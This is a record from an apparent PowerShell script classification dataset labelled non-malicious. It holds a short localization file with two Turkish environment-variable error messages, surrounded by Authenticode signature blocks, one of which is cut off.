# KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx
# MDEyMTkwNzM1WhcNMjUwMTEwMTkwNzM1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl
# cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjozQkQ0LTRC
# ODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC
# AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKl74Drau2O6LLrJO3HyTvO9
# aXai//eNyP5MLWZrmUGNOJMPwMI08V9zBfRPNcucreIYSyJHjkMIUGmuh0rPV5/2
# +UCLGrN1P77n9fq/mdzXMN1FzqaPHdKElKneJQ8R6cP4dru2Gymmt1rrGcNe800C
# cD6d/Ndoommkd196VqOtjZFA1XWu+GsFBeWHiez/PllqcM/eWntkQMs0lK0zmCfH
# +Bu7i1h+FDRR8F7WzUr/7M3jhVdPpAfq2zYCA8ZVLNgEizY+vFmgx+zDuuU/GChD
# K7klDcCw+/gVoEuSOl5clQsydWQjJJX7Z2yV+1KC6G1JVqpP3dpKPAP/4udNqpR5
# HIeb8Ta1JfjRUzSv3qSje5y9RYT/AjWNYQ7gsezuDWM/8cZ11kco1JvUyOQ8x/JD
# kMFqSRwj1v+mc6LKKlj//dWCG/Hw9ppdlWJX6psDesQuQR7FV7eCqV/lfajoLpPN
# x/9zF1dv8yXBdzmWJPeCie2XaQnrAKDqlG3zXux9tNQmz2L96TdxnIO2OGmYxBAA
# ZAWoKbmtYI+Ciz4CYyO0Fm5Z3T40a5d7KJuftF6CToccc/Up/jpFfQitLfjd71cS
# +cLCeoQ+q0n0IALvV+acbENouSOrjv/QtY4FIjHlI5zdJzJnGskVJ5ozhji0YRsc
# v1WwJFAuyyCMQvLdmPddAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU3/+fh7tNczEi
# fEXlCQgFOXgMh6owHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD
# VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
# cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG
# CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw
# MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD
# CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBADP6whOFjD1ad8Gk
# EJ9oLBuvfjndMyGQ9R4HgBKSlPt3pa0XVLcimrJlDnKGgFBiWwI6XOgw82hdolDi
# MDBLLWRMTJHWVeUY1gU4XB8OOIxBc9/Q83zb1c0RWEupgC48I+b+2x2VNgGJUsQI
# yPR2PiXQhT5PyerMgag9OSodQjFwpNdGirna2rpV23EUwFeO5+3oSX4JeCNZvgyU
# OzKpyMvqVaubo+Glf/psfW5tIcMjZVt0elswfq0qJNQgoYipbaTvv7xmixUJGTbi
# xYifTwAivPcKNdeisZmtts7OHbAM795ZvKLSEqXiRUjDYZyeHyAysMEALbIhdXgH
# Eh60KoZyzlBXz3VxEirE7nhucNwM2tViOlwI7EkeU5hudctnXCG55JuMw/wb7c71
# RKimZA/KXlWpmBvkJkB0BZES8OCGDd+zY/T9BnTp8si36Tql84VfpYe9iHmy7Pqq
# xqMF2Cn4q2a0mEMnpBruDGE/gR9c8SVJ2ntkARy5SfluuJ/MB61yRvT1mUx3lypp
# O22ePjBjnwoEvVxbDjT1jhdMNdevOuDeJGzRLK9HNmTDC+TdZQlj+VMgIm8ZeEIR
# NF0oaviF+QZcUZLWzWbYq6yDok8EZKFiRR5otBoGLvaYFpxBZUE8mnLKuDlYobjr
# xh7lnwrxV/fMy0F9fSo2JxFmtLgtMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ
# mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh
# dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1
# WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB
# BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK
# NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg
# fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp
# rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d
# vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9
# 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR
# Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu
# qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO
# ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb
# oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6
# bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t
# AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW
# BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb
# UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz
# aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku
# aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA
# QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2
# VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu
# bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw
# LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93
# d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt
# MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q
# XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6
# U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt
# I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis
# 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp
# kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0
# sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e
# W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ
# sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7
# Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0
# dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ
# tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh
# bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoz
# QkQ0LTRCODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy
# dmljZaIjCgEBMAcGBSsOAwIaAxUA942iGuYFrsE4wzWDd85EpM6RiwqggYMwgYCk
# fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF
# AOn5tDwwIhgPMjAyNDA1MjMyMDI1MzJaGA8yMDI0MDUyNDIwMjUzMlowdDA6Bgor
# BgEEAYRZCgQBMSwwKjAKAgUA6fm0PAIBADAHAgEAAgIfUDAHAgEAAgIROjAKAgUA
# 6fsFvAIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID
# B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAIe/u5838nGR9EzpZ44M
# LiBjlhIkjwROD/B2lKRQnu3DXYg7POmK1vKJyHjUdUCUO51DBAjc2MHBsbl/WJAh
# 24ImfAlb41EbjrKeRygX9HjPzU11ATBP3ixfiIW6fJ6jw9tzKO5xQG50KdmmkdmW
# yd/89+I2OCwx1/B96Td7TLxZMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt
# U3RhbXAgUENBIDIwMTACEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJYIZIAWUDBAIB
# BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx
# IgQgjZ7o7IWzAaRZedVWaRH2QE7ubufWsayr22xRY+phQNEwgfoGCyqGSIb3DQEJ
# EAIvMYHqMIHnMIHkMIG9BCAVqdP//qjxGFhe2YboEXeb8I/pAof01CwhbxUH9U69
# 7TCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB5Y9q
# wPM9tAujAAEAAAHlMCIEIE+Arhtui24CgetcVTRm75UZQo/QbLm6UTfQP9Ao5kDu
# MA0GCSqGSIb3DQEBCwUABIICAIVi1bowo+F80Dlg3p2obETMW6WQWKdrj+41oTpo
# 0IV1oS5vmDVkctsmXBgeIyhnNbztzdax2DsVaf8dSz1G4rZIb8CtlCj6smuoizgJ
# YvOeYMqoR6Pg3+NmZO8oLWXaqxEGFSNnPrKQsUTyGkQ9OA5s150wnaE9nBAUnBoK
# 30j4Veya2tIq7HLAJWg2Y98Duwyq9DGJXxzCYDbsJ6oOXmXuqGtOFwrM4m0Pmy7K
# kd8I7DbYxxFe0KmkjkGhnbZfid8LS6Evodi1bSr2AcZg+oJhIdGiblt//kiqNv4H
# 28brY+hkZ8xzvCbmSFDETszJwT1RVuD5UM5s5fPJiuR8XOBkTMsEiWXOZ5XsVtVU
# sbk3NFOygWje/0cm7BCpuPWw/HN3y2q5rAHiHJ7jZeLiNKbNGoroolSRPWs/aDEK
# 6l4dOMRFwBS9Z9v5DXCOwTcp9/kikwmu2Ft/EdMmyi4rl2hMpM/KYcTIEQC0zGaZ
# sc79J6QjA7i6KCCDBEkKJDihOAiOHE34F0AF2ZGc++rjpsGneabAOWw0CsAE/EPx
# MkDSUfcKpC8LHw4vFf35mtGSE/vKoNR8M9w2nZCKduSboVkeBShFdCztxP5S0g7Z
# z5zuBvRMv1RFwN8bvkm+pG5WrmW19vlbWTnGuCemcHI+9hRZFbws659yMTLCCQ+t
# IrsR
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_45_84.ps1
|
sample_45_84.ps1
|
ConvertFrom-StringData @'
EnvironmentErrorAlreadyExists=Bu adda ve türde bir ortam değişkeni zaten var.
EnvironmentErrorDoesNotExists=Bu adda ve türde bir ortam değişkeni yok.
'@
# SIG # Begin signature block
# MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCWIyGdoQMJ/x6U
# 7uom6WVVjDDsgHh0SA5d2Jh+64bqEqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIOyPJS5Q6bhrG3vOrrMDlrNU
# JfCvZrVxcLQBoUtWZSHIMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAsdF9X4tfSiC7xC0CYIW+ZWv0HxXX8FHZ8PdT4YWdVkACD1QC+EzpZHM2
# 8PAOJ103hfDIFF75FcpkwpZ5ncAQCS+csHvsMvYzTY8+4oac8gTLiQpKQnhGWdLf
# pSPvQHVF2B4sEF/UkcT2nokFMlCPW/T+NIOZqhw/PtUVKduDlDvbn+KTcahbHTBg
# yDghyY+McRpRACw/lu6RTzQbWkLzRHvHi5CNt981m/CpDyNn2y2RMBV6kh39Au0h
# 2z+tPIm8OPh46hWi5x+pnUVG6SrxRPSqQpiPemjK/mDJ/DGyo3qyY5y6tEsPUoH6
# ty5YW96XODmrOdidq45mFC89T/PcPaGCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC
# F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq
# hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCDsXvZTmRIlr1pEQUQ28621toh8o29XHt2EkmBKB/CkigIGZZ/4hB1a
# GBMyMDI0MDEzMDE4MjgzMi4xOTlaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046ODYwMy0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg
# ghHqMIIHIDCCBQigAwIBAgITMwAAAdebDR5XLoxRjgABAAAB1zANBgkqhkiG9w0B
# AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
# VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzA1MjUxOTEy
# MzdaFw0yNDAyMDExOTEyMzdaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z
# MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046ODYwMy0wNUUwLUQ5NDcxJTAjBgNV
# BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQDErGCkN2X/UvuNCcfl0yVBNo+LIIyzG7A10X5kVgGn
# p9s8mf4aZsukZu5rvLs7NqaNExcwnPuHIWdp6kswja1Yw9SxTX+E0leq+WBucIRK
# WdcMumIDBgLE0Eb/3/BY95ZtT1XsnnatBFZhr0uLkDiT9HgrRb122sm7/YkyMigF
# kT0JuoiSPXoLL7waUE9teI9QOkojqjRlcIC4YVNY+2UIBM5QorKNaOdz/so+TIF6
# mzxX5ny2U/o/iMFVTfvwm4T8g/Yqxwye+lOma9KK98v6vwe/ii72TMTVWwKXFdXO
# ysP9GiocXt38cuP9c8aE1eH3q4FdGTgKOd0rG+xhCgsRF8GqLT7k58VpQnJ8u+yj
# RW6Lomt5Rcropgf9EH8e4foDUoUyU5Q7iPgwOJxYhoKxRjGZlthDmp5ex+6U6zv9
# 5rd973668pGpCku0IB43L/BTzMcDAV4/xu6RfcVFwarN/yJq5qfZyMspH5gcaTCV
# AouXkQTc8LwtfxtgIz53qMSVR9c9gkSnxM5c1tHgiMX3D2GBnQan95ty+CdTYAAh
# jgBTcyj9P7OGEMhr3lyaZxjr3gps6Zmo47VOTI8tsSYHhHtD8BpBog39L5e4/lDJ
# g/Oq4rGsFKSxMXuIRZ1E08dmX67XM7qmvm27O804ChEmb+COR8Wb46MFEEz62ju+
# xQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFK6nwLv9WQL3NIxEJyPuJMZ6MI2NMB8G
# A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG
